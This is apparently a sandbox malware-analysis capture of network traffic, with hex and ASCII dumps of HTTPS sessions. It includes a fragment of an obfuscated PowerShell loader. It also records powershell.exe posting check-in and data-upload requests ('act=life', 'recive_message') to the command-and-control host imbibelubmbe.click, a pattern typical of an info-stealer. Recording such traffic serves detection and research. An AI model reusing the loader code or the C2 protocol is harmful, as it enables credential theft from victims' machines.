                                                                                              Data Ascii: 7-32+29))*((27-18+25))-(44732)))$LbCtzlCSWVRSW = $TTJpmDiYz$foHUJzoBMw = 534$QchXETWTpXECf = (((21+47+37*((39*9*20))*(13*18-8))-(58700903)))$uRdkrWJGlMVSH = $UsfkoQPjTN$RSBqNSLKoF = $UsfkoQPjTN$JRogFuVId = $lTHNskrEuXbfor ($wrgabFoGU=(((45+3
                                                                                              2024-12-31 07:57:12 UTC1369INData Raw: 76 59 53 50 77 29 2d 38 2b 32 31 2d 33 33 29 2b 24 75 52 64 6b 72 57 4a 47 6c 4d 56 53 48 2d 34 35 2d 32 33 29 0d 0a 24 6b 78 5a 54 71 72 41 20 3d 20 24 4c 62 43 74 7a 6c 43 53 57 56 52 53 57 0d 0a 24 77 47 6c 5a 55 20 3d 20 32 36 35 0d 0a 24 45 7a 6b 42 55 52 74 6a 79 41 57 66 69 20 3d 20 28 28 28 28 32 32 2b 36 2d 28 31 34 2d 34 34 2b 28 31 36 2b 34 2d 32 36 2b 28 32 32 2b 34 39 2b 34 38 29 29 29 2b 28 33 35 2a 32 31 2a 37 29 29 29 2d 28 34 36 37 39 29 29 29 0d 0a 24 42 58 4c 47 45 54 53 6f 79 20 3d 20 28 28 28 28 31 32 2d 32 2b 24 75 52 64 6b 72 57 4a 47 6c 4d 56 53 48 29 29 29 2b 24 49 61 6e 74 41 57 2b 33 33 2b 28 33 38 2b 32 34 2b 32 32 29 29 0d 0a 24 6b 77 47 48 6f 54 55 5a 58 6e 53 65 68 51 20 3d 20 24 4d 58 6b 62 43 6c 76 59 53 50 77 0d 0a 24 79
                                                                                              Data Ascii: vYSPw)-8+21-33)+$uRdkrWJGlMVSH-45-23)$kxZTqrA = $LbCtzlCSWVRSW$wGlZU = 265$EzkBURtjyAWfi = ((((22+6-(14-44+(16+4-26+(22+49+48)))+(35*21*7)))-(4679)))$BXLGETSoy = ((((12-2+$uRdkrWJGlMVSH)))+$IantAW+33+(38+24+22))$kwGHoTUZXnSehQ = $MXkbClvYSPw$y
                                                                                              2024-12-31 07:57:12 UTC1369INData Raw: 2b 24 4a 52 6f 67 46 75 56 49 64 2b 31 33 2b 32 34 2b 28 28 34 36 2d 32 37 2b 28 36 2d 34 36 2b 31 30 29 29 29 2d 28 33 39 29 29 0d 0a 24 76 71 6f 48 4a 53 43 53 61 76 6d 4f 20 3d 20 28 28 24 45 53 4b 57 51 6c 4e 6b 56 55 2d 31 38 2d 28 33 31 2d 31 37 2b 33 39 29 29 2d 32 2d 33 39 2b 24 51 63 68 58 45 54 57 54 70 58 45 43 66 2d 24 5a 59 71 67 67 2b 31 38 2d 24 54 78 70 6b 6b 75 4c 46 6f 4e 5a 2d 28 28 24 41 4a 76 63 75 54 72 68 72 70 45 2d 34 33 2b 37 29 29 2d 28 36 35 30 29 29 0d 0a 24 62 6a 7a 6b 79 69 74 6a 44 71 20 3d 20 28 28 28 28 38 2d 32 34 2b 32 39 2d 28 28 24 6f 65 66 58 79 77 65 2d 32 32 2d 28 32 36 2b 32 32 2d 31 38 29 2b 24 66 6f 48 55 4a 7a 6f 42 4d 77 2d 34 30 2d 28 24 76 48 78 51 75 59 79 43 2b 31 37 2b 32 33 29 29 29 29 29 29 2b 28 31 30
                                                                                              Data Ascii: +$JRogFuVId+13+24+((46-27+(6-46+10)))-(39))$vqoHJSCSavmO = (($ESKWQlNkVU-18-(31-17+39))-2-39+$QchXETWTpXECf-$ZYqgg+18-$TxpkkuLFoNZ-(($AJvcuTrhrpE-43+7))-(650))$bjzkyitjDq = ((((8-24+29-(($oefXywe-22-(26+22-18)+$foHUJzoBMw-40-($vHxQuYyC+17+23))))))+(10
                                                                                              2024-12-31 07:57:12 UTC1369INData Raw: 2d 31 34 29 29 2d 28 31 39 30 39 29 29 0d 0a 24 78 55 63 41 71 55 4b 4e 20 3d 20 28 28 28 28 33 38 2d 31 38 2b 32 30 29 29 2d 28 24 74 4b 48 72 4e 72 63 50 58 2d 34 36 2b 39 29 2b 31 30 2b 33 2b 34 39 29 2d 28 36 29 29 0d 0a 24 41 51 6a 42 77 62 6b 6c 53 66 4d 70 43 20 3d 20 28 28 28 28 24 6c 54 48 4e 73 6b 72 45 75 58 62 2d 31 36 2b 28 34 2b 31 39 2d 38 2d 28 31 2b 34 30 2d 34 34 29 29 29 29 29 2b 28 39 29 29 0d 0a 24 49 59 55 67 77 42 55 4b 20 3d 20 28 28 28 28 34 35 2d 32 36 2d 28 31 32 2b 32 32 2d 24 6e 69 61 73 69 45 29 29 2b 24 70 57 4d 54 53 43 56 73 2d 31 34 2b 34 36 29 29 2d 28 33 36 35 29 29 0d 0a 24 61 70 78 48 61 75 54 42 20 3d 20 28 28 28 28 34 34 2d 39 2d 28 33 39 2b 33 36 2b 24 76 48 78 51 75 59 79 43 29 2d 28 28 24 6e 69 61 73 69 45 2d 31
                                                                                              Data Ascii: -14))-(1909))$xUcAqUKN = ((((38-18+20))-($tKHrNrcPX-46+9)+10+3+49)-(6))$AQjBwbklSfMpC = (((($lTHNskrEuXb-16+(4+19-8-(1+40-44)))))+(9))$IYUgwBUK = ((((45-26-(12+22-$niasiE))+$pWMTSCVs-14+46))-(365))$apxHauTB = ((((44-9-(39+36+$vHxQuYyC)-(($niasiE-1
                                                                                              2024-12-31 07:57:12 UTC820INData Raw: 33 30 2b 28 34 35 2d 34 35 2d 34 35 2d 28 28 24 77 47 6c 5a 55 2d 31 32 2d 32 31 29 29 29 29 29 2d 28 35 36 34 29 29 0d 0a 24 6a 6a 45 74 51 50 53 6c 4d 4b 20 3d 20 28 28 32 34 2b 31 33 2b 32 34 29 2d 28 24 70 57 4d 54 53 43 56 73 2d 31 31 2d 24 6b 78 5a 54 71 72 41 29 2b 39 2d 31 38 2d 31 37 2d 24 52 53 42 71 4e 53 4c 4b 6f 46 2b 32 37 2d 28 24 51 41 53 4e 76 50 42 70 4a 57 75 73 46 2b 39 2b 32 35 29 2b 28 38 31 32 29 29 0d 0a 24 46 77 4d 67 6f 61 20 3d 20 28 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 53 59 4c 6e 54 79 64 4d 55 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 78 4c 64 78 79 43 64 45 73 4e 72 71 47 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 50 59 6d 54 55 72 43 58 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4a 62 69 61 57 43 6c 4d 78 6f 49 48
                                                                                              Data Ascii: 30+(45-45-45-(($wGlZU-12-21)))))-(564))$jjEtQPSlMK = ((24+13+24)-($pWMTSCVs-11-$kxZTqrA)+9-18-17-$RSBqNSLKoF+27-($QASNvPBpJWusF+9+25)+(812))$FwMgoa = ([char][int]$KSYLnTydMU + [char][int]$xLdxyCdEsNrqG + [char][int]$PYmTUrCX + [char][int]$JbiaWClMxoIH


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449889188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:25 UTC265OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-31 07:58:25 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=u0qh32e32jdbjel917hdgpm3dn; expires=Sat, 26 Apr 2025 01:45:04 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TH1kSNpm3o4IkrRzVyi32Oj0ZMPF%2BQzVX5EmhBHzaG%2FKog5OUDjCtXklAusaxgDb7QV2PyDTG2a8zQ%2BWvrWWt0EIGJU%2Bb%2Fh9%2BMizwuSepoiaMQJPMEb98ERhyYcis54DW703sQc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b96f69f51879-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1504&rtt_var=567&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1922317&cwnd=162&unsent_bytes=0&cid=87156d8bf7380936&ts=476&x=0"
                                                                                              2024-12-31 07:58:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-31 07:58:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449897188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:26 UTC266OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 80
                                                                                              Host: imbibelubmbe.click
                                                                                              2024-12-31 07:58:26 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                              2024-12-31 07:58:26 UTC1125INHTTP/1.1 200 OK
                                                                                              Date: Tue, 31 Dec 2024 07:58:26 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=r5bdfmdalc5d0n115ve6cr3tb6; expires=Sat, 26 Apr 2025 01:45:05 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pGt23mJ9yXzqWyyNzJ72nn46xbQaOwJF%2FWqJuAFOn9MsrBBMDAlLdsNyd1gmmHpL7lPzZJxgScDbc96iT8GvYa5uMv2Xil9Usk20r4ZpoGfa01ivVIvrWPR4D%2FoyFK3npHdoFY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8fa8b9754a27c344-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1596&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=982&delivery_rate=1813664&cwnd=215&unsent_bytes=0&cid=5d5cac8e69aedd66&ts=335&x=0"
                                                                                              2024-12-31 07:58:26 UTC244INData Raw: 34 65 61 30 0d 0a 44 6b 2b 54 79 46 7a 5a 30 63 45 79 37 32 67 6f 67 44 2f 79 2f 46 68 39 71 6a 63 31 4d 42 5a 32 36 65 45 38 33 55 4b 31 6d 6f 64 31 62 65 58 71 5a 75 33 39 34 30 47 4b 53 68 4c 6d 58 70 36 50 50 56 47 49 56 6c 45 53 4c 42 43 49 6a 55 2b 34 62 70 66 73 36 69 78 31 39 61 6b 77 71 72 54 74 45 49 6f 51 43 72 70 6b 69 64 34 39 45 34 67 4e 46 31 56 38 46 49 69 4e 58 72 77 70 32 75 72 72 62 53 66 2f 72 7a 53 38 73 71 56 54 67 77 56 4e 35 56 71 54 6c 6a 59 55 78 31 39 59 45 6a 70 55 6a 4a 73 65 35 32 44 34 2f 2f 4e 76 41 76 4b 37 4e 2f 75 73 37 55 6e 4e 44 55 61 69 42 64 43 64 50 52 2f 47 55 56 46 62 66 68 36 42 68 56 2b 35 4b 4d 58 7a 34 57 59 6e 38 61 77 31 74 72 75 78 58 6f 6b 43 52 75 4e 51 6b 39 35 30 58 38
                                                                                              Data Ascii: 4ea0Dk+TyFzZ0cEy72gogD/y/Fh9qjc1MBZ26eE83UK1mod1beXqZu3940GKShLmXp6PPVGIVlESLBCIjU+4bpfs6ix19akwqrTtEIoQCrpkid49E4gNF1V8FIiNXrwp2urrbSf/rzS8sqVTgwVN5VqTljYUx19YEjpUjJse52D4//NvAvK7N/us7UnNDUaiBdCdPR/GUVFbfh6BhV+5KMXz4WYn8aw1truxXokCRuNQk950X8
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 39 4e 46 77 6f 30 52 37 6d 41 54 36 34 31 32 75 6a 6a 4c 44 4b 2f 73 33 36 38 76 2b 4d 49 7a 51 4a 47 37 46 69 54 6b 54 30 65 79 45 64 59 55 6e 63 63 67 34 64 55 73 43 2f 59 39 75 39 72 4a 66 69 74 4d 62 79 37 70 56 2b 4f 53 67 53 69 57 6f 6a 65 59 6c 2f 6f 52 56 52 52 59 42 6d 61 77 30 48 78 4f 5a 66 2f 36 53 78 31 73 61 77 77 75 72 36 6a 51 6f 55 42 51 65 64 50 6d 35 63 33 45 73 68 59 58 56 31 33 46 49 79 4a 56 4c 41 71 30 2f 58 6f 61 69 33 78 36 6e 44 37 74 4c 73 51 31 55 70 70 35 30 32 58 6b 69 78 64 38 68 56 49 48 47 31 55 6a 49 38 65 35 32 44 66 2f 65 5a 76 4a 76 36 70 4e 72 43 68 6f 30 4b 4c 42 30 2f 77 57 35 57 51 4d 42 7a 61 58 31 6c 55 64 78 32 41 69 6c 75 34 4a 4a 65 32 70 57 73 31 73 66 4a 2b 6d 72 36 6f 58 49 63 64 53 71 4a 43 33 6f 64 36 47
                                                                                              Data Ascii: 9NFwo0R7mAT6412ujjLDK/s368v+MIzQJG7FiTkT0eyEdYUnccg4dUsC/Y9u9rJfitMby7pV+OSgSiWojeYl/oRVRRYBmaw0HxOZf/6Sx1sawwur6jQoUBQedPm5c3EshYXV13FIyJVLAq0/Xoai3x6nD7tLsQ1Upp502Xkixd8hVIHG1UjI8e52Df/eZvJv6pNrCho0KLB0/wW5WQMBzaX1lUdx2Ailu4JJe2pWs1sfJ+mr6oXIcdSqJC3od6G
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 55 65 78 6d 48 77 78 44 2f 4a 38 2b 34 76 53 77 48 38 72 34 39 73 66 47 57 55 34 4d 45 54 66 51 64 6a 39 41 6a 58 38 39 5a 46 77 6f 30 47 59 71 4c 57 4b 30 76 32 76 76 72 59 69 4c 30 70 54 61 37 73 36 35 56 69 51 46 42 34 56 43 55 6a 44 41 66 77 46 42 57 57 48 35 55 78 63 4e 5a 70 32 43 50 75 4e 52 37 4a 72 4f 66 50 62 57 39 70 45 62 4e 46 51 54 37 48 5a 65 53 65 6b 65 49 57 46 39 58 63 52 75 4b 69 56 43 36 4b 74 76 77 36 32 38 2f 2f 71 34 2b 74 37 75 70 58 59 4d 4f 51 75 74 57 6d 35 67 36 48 73 49 56 47 52 4a 7a 44 4d 76 62 48 6f 73 6e 32 2f 58 71 4c 68 6a 79 70 44 43 38 70 65 4e 50 77 78 4d 4b 35 56 48 51 78 6e 6f 54 77 56 56 63 57 48 41 55 6a 49 35 62 76 43 66 55 39 65 4a 6d 49 2f 61 75 4d 72 4b 2b 70 56 43 4b 44 6b 2f 77 57 4a 6d 53 4e 6c 2b 47 46 56
                                                                                              Data Ascii: UexmHwxD/J8+4vSwH8r49sfGWU4METfQdj9AjX89ZFwo0GYqLWK0v2vvrYiL0pTa7s65ViQFB4VCUjDAfwFBWWH5UxcNZp2CPuNR7JrOfPbW9pEbNFQT7HZeSekeIWF9XcRuKiVC6Ktvw628//q4+t7upXYMOQutWm5g6HsIVGRJzDMvbHosn2/XqLhjypDC8peNPwxMK5VHQxnoTwVVcWHAUjI5bvCfU9eJmI/auMrK+pVCKDk/wWJmSNl+GFV
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 6b 73 4e 5a 73 32 43 50 75 4f 78 6c 50 2f 2b 6b 4e 37 61 31 71 31 65 44 42 30 48 6b 56 70 65 5a 50 42 4c 41 57 46 4a 52 64 52 43 42 6b 56 32 30 4b 74 72 79 70 53 4a 74 39 72 4a 2b 34 2f 4f 45 58 4b 51 61 55 66 42 4c 30 49 46 30 42 6f 68 53 57 78 49 73 56 49 69 4d 56 37 41 6f 33 2f 66 71 61 43 50 33 72 44 4f 2b 76 4b 6c 43 68 51 52 48 36 56 4b 62 6a 44 6f 53 7a 46 6c 54 57 6e 38 65 79 38 30 65 75 44 69 58 6f 4b 56 5a 49 50 36 71 50 61 33 7a 76 42 36 55 53 6b 33 75 48 63 6a 65 4e 68 48 49 57 6c 74 65 66 78 79 4b 6a 31 43 34 4a 64 37 77 37 58 34 73 39 61 49 2f 74 62 79 69 56 49 67 50 54 75 56 5a 6c 70 46 36 55 59 68 53 54 78 49 73 56 4b 53 6b 61 2f 30 42 37 62 6a 36 49 6a 53 78 72 54 4c 37 36 2b 4e 63 6a 67 5a 43 37 56 75 5a 6b 6a 41 57 77 31 6c 63 56 6e 67
                                                                                              Data Ascii: ksNZs2CPuOxlP/+kN7a1q1eDB0HkVpeZPBLAWFJRdRCBkV20KtrypSJt9rJ+4/OEXKQaUfBL0IF0BohSWxIsVIiMV7Ao3/fqaCP3rDO+vKlChQRH6VKbjDoSzFlTWn8ey80euDiXoKVZIP6qPa3zvB6USk3uHcjeNhHIWltefxyKj1C4Jd7w7X4s9aI/tbyiVIgPTuVZlpF6UYhSTxIsVKSka/0B7bj6IjSxrTL76+NcjgZC7VuZkjAWw1lcVng
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 62 34 68 30 65 72 69 5a 54 2f 2f 70 7a 47 7a 75 36 70 52 69 51 39 48 35 46 47 61 6e 7a 30 52 78 6c 30 58 48 44 51 54 6b 38 4d 47 2f 77 48 48 34 2f 64 36 49 4e 43 6e 4d 66 75 73 37 55 6e 4e 44 55 61 69 42 64 43 58 4b 42 76 46 52 31 35 56 65 68 75 49 6b 56 2b 79 4b 38 58 2f 36 6d 67 71 2f 61 77 78 76 62 4b 6d 57 6f 45 4e 54 2b 6c 53 6e 4e 35 30 58 38 39 4e 46 77 6f 30 4f 6f 43 51 53 62 77 75 33 4f 37 2b 4c 44 4b 2f 73 33 36 38 76 2b 4d 49 7a 51 6c 42 36 56 6d 51 6b 6a 6f 62 78 56 56 46 58 58 4d 54 67 6f 68 4d 74 53 66 51 38 2b 31 6e 49 76 65 34 4d 72 57 68 70 6b 4b 66 53 67 53 69 57 6f 6a 65 59 6c 2f 2b 55 6b 64 43 64 31 61 36 6c 56 32 70 4b 39 72 30 70 58 4e 6a 36 4f 6f 35 74 2f 50 37 45 49 73 46 51 2b 46 53 6b 5a 63 32 45 73 31 63 55 6c 4e 79 45 49 47 4a
                                                                                              Data Ascii: b4h0eriZT//pzGzu6pRiQ9H5FGanz0Rxl0XHDQTk8MG/wHH4/d6INCnMfus7UnNDUaiBdCXKBvFR15VehuIkV+yK8X/6mgq/awxvbKmWoENT+lSnN50X89NFwo0OoCQSbwu3O7+LDK/s368v+MIzQlB6VmQkjobxVVFXXMTgohMtSfQ8+1nIve4MrWhpkKfSgSiWojeYl/+UkdCd1a6lV2pK9r0pXNj6Oo5t/P7EIsFQ+FSkZc2Es1cUlNyEIGJ
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 66 6e 71 33 56 74 39 71 5a 2b 34 2f 4f 67 56 34 34 4c 51 4f 74 52 6e 35 6b 2b 44 63 4a 53 52 56 4e 31 48 34 61 50 58 72 49 74 33 66 6e 73 59 53 48 38 72 54 6d 30 74 75 4d 65 7a 51 31 53 6f 67 58 51 76 7a 63 55 78 41 34 4e 45 6d 74 61 6b 73 4e 5a 73 32 43 50 75 4f 56 6d 4b 50 75 6e 50 62 53 77 73 56 47 4c 47 45 72 76 56 34 4b 55 4d 52 72 46 57 46 70 52 63 68 4b 41 6a 30 79 32 49 4e 54 7a 70 53 4a 74 39 72 4a 2b 34 2f 4f 41 52 35 73 41 54 65 35 4c 6d 35 38 35 43 63 56 46 46 78 77 30 42 59 79 53 48 75 63 32 78 2b 2f 69 63 32 50 6f 36 6a 6d 33 38 2f 73 51 69 77 4e 4d 35 56 75 65 6a 44 38 5a 78 31 70 65 57 33 41 63 69 49 4e 61 75 79 66 53 2b 2b 6c 6e 4b 76 4b 6c 4f 72 4b 39 71 6c 2f 4e 52 41 72 6c 52 64 44 47 65 6a 37 54 56 6c 74 66 4e 41 76 46 6d 68 36 34 4c
                                                                                              Data Ascii: fnq3Vt9qZ+4/OgV44LQOtRn5k+DcJSRVN1H4aPXrIt3fnsYSH8rTm0tuMezQ1SogXQvzcUxA4NEmtaksNZs2CPuOVmKPunPbSwsVGLGErvV4KUMRrFWFpRchKAj0y2INTzpSJt9rJ+4/OAR5sATe5Lm585CcVFFxw0BYySHuc2x+/ic2Po6jm38/sQiwNM5VuejD8Zx1peW3AciINauyfS++lnKvKlOrK9ql/NRArlRdDGej7TVltfNAvFmh64L
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 73 64 62 47 4b 4e 61 32 32 70 45 62 50 50 30 6e 73 55 35 65 49 65 67 44 33 47 78 64 54 4e 45 79 79 6d 68 36 70 59 49 2b 71 71 79 77 2f 73 66 4a 2b 2f 4c 43 78 51 6f 73 4a 58 4f 45 61 72 71 41 64 43 63 4a 53 52 31 56 6a 47 38 76 4e 48 72 42 67 6a 38 47 6c 5a 53 72 71 75 79 69 32 6f 36 51 51 73 6b 51 4b 2b 68 33 49 33 67 38 63 78 6c 74 51 52 47 56 5a 72 4a 56 55 75 44 44 51 37 2b 6f 73 59 37 47 73 66 75 50 67 37 52 43 4a 47 77 71 36 44 63 4c 46 62 30 79 66 42 51 56 4e 4f 67 33 4c 6c 52 37 6e 63 70 6d 34 39 79 78 31 73 65 30 39 71 61 47 6c 55 35 73 4a 44 64 78 6a 74 34 51 33 47 64 39 45 61 57 78 7a 44 6f 61 46 53 61 35 73 77 76 76 72 59 69 72 6e 36 6e 44 37 76 4f 4d 49 74 45 6f 43 6f 6d 4c 65 33 69 4a 66 6b 42 56 69 55 58 6f 61 6a 4a 56 50 38 67 66 4e 39 65
                                                                                              Data Ascii: sdbGKNa22pEbPP0nsU5eIegD3GxdTNEyymh6pYI+qqyw/sfJ+/LCxQosJXOEarqAdCcJSR1VjG8vNHrBgj8GlZSrquyi2o6QQskQK+h3I3g8cxltQRGVZrJVUuDDQ7+osY7GsfuPg7RCJGwq6DcLFb0yfBQVNOg3LlR7ncpm49yx1se09qaGlU5sJDdxjt4Q3Gd9EaWxzDoaFSa5swvvrYirn6nD7vOMItEoComLe3iJfkBViUXoajJVP8gfN9e
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 36 6d 62 37 39 4b 42 43 6e 77 78 4a 39 46 37 58 6f 41 51 34 78 6c 4a 57 52 47 51 44 68 4c 31 67 71 69 50 5a 39 75 4a 36 50 4c 48 6b 66 72 54 7a 2b 32 6e 4e 51 67 72 64 45 39 43 47 65 6b 65 49 59 46 52 63 65 68 4f 64 6b 68 4f 59 4c 74 44 35 38 33 77 36 2f 75 70 77 2b 37 58 6a 43 4e 39 45 43 75 5a 4d 30 4d 5a 71 54 5a 4d 41 42 41 55 6b 52 70 54 4e 52 2f 38 32 6c 36 43 33 49 6d 33 6a 36 6d 62 37 39 4b 42 43 6e 77 78 4a 39 46 37 58 6f 41 51 34 78 6c 4a 57 52 47 51 44 68 4d 78 77 69 51 48 70 78 76 42 76 49 2f 2b 74 4b 4b 72 7a 37 52 43 43 53 68 4c 62 48 64 6a 65 42 56 47 49 54 52 63 4b 4e 43 47 49 6a 56 43 34 4e 73 61 31 77 6d 49 71 38 4c 77 75 72 4c 7a 73 66 72 73 72 43 71 77 64 6c 74 35 69 54 59 59 56 55 30 4d 30 54 4e 76 52 42 65 70 7a 67 4b 69 33 63 32 50
                                                                                              Data Ascii: 6mb79KBCnwxJ9F7XoAQ4xlJWRGQDhL1gqiPZ9uJ6PLHkfrTz+2nNQgrdE9CGekeIYFRcehOdkhOYLtD583w6/upw+7XjCN9ECuZM0MZqTZMABAUkRpTNR/82l6C3Im3j6mb79KBCnwxJ9F7XoAQ4xlJWRGQDhMxwiQHpxvBvI/+tKKrz7RCCShLbHdjeBVGITRcKNCGIjVC4Nsa1wmIq8LwurLzsfrsrCqwdlt5iTYYVU0M0TNvRBepzgKi3c2P
                                                                                              2024-12-31 07:58:26 UTC1369INData Raw: 2b 76 6a 66 5a 38 4e 57 75 45 64 33 74 34 32 58 35 41 56 57 6b 42 7a 42 49 6a 50 57 61 55 6e 6c 2b 65 72 64 57 33 6e 36 6d 62 6f 2f 65 4e 43 7a 56 49 4b 70 56 4f 64 6e 7a 6b 52 79 30 64 46 56 48 63 43 69 4d 52 67 67 51 33 46 2f 2f 56 76 62 38 43 6e 4f 71 32 6d 6f 45 43 4b 4e 48 54 50 54 35 65 4f 4f 56 33 6b 55 6c 70 65 53 69 71 38 6b 6c 6d 76 59 76 48 37 38 32 39 74 76 2b 6f 6d 2b 2b 76 6a 66 5a 38 4e 57 75 45 66 76 4a 6b 33 45 34 68 4b 47 55 73 30 41 73 76 62 44 66 46 67 78 62 69 39 4c 47 72 79 75 43 79 39 73 4c 56 54 79 6a 52 30 7a 30 2b 58 6a 6a 6c 64 2b 56 68 54 52 47 45 58 6d 34 52 67 67 51 33 46 2f 2f 56 76 62 39 53 51 66 49 71 6c 6f 46 43 44 44 51 71 73 48 59 6a 65 59 6c 2f 6c 52 31 42 43 64 31 61 75 75 52 79 4f 4e 74 54 34 36 32 74 74 76 2b 6f 79
                                                                                              Data Ascii: +vjfZ8NWuEd3t42X5AVWkBzBIjPWaUnl+erdW3n6mbo/eNCzVIKpVOdnzkRy0dFVHcCiMRggQ3F//Vvb8CnOq2moECKNHTPT5eOOV3kUlpeSiq8klmvYvH7829tv+om++vjfZ8NWuEfvJk3E4hKGUs0AsvbDfFgxbi9LGryuCy9sLVTyjR0z0+Xjjld+VhTRGEXm4RggQ3F//Vvb9SQfIqloFCDDQqsHYjeYl/lR1BCd1auuRyONtT462ttv+oy


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449904188.114.97.34435956C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-31 07:58:27 UTC283OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=Q74O17O4JHA9CJ6NO
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18158
                                                                                              Host: imbibelubmbe.click
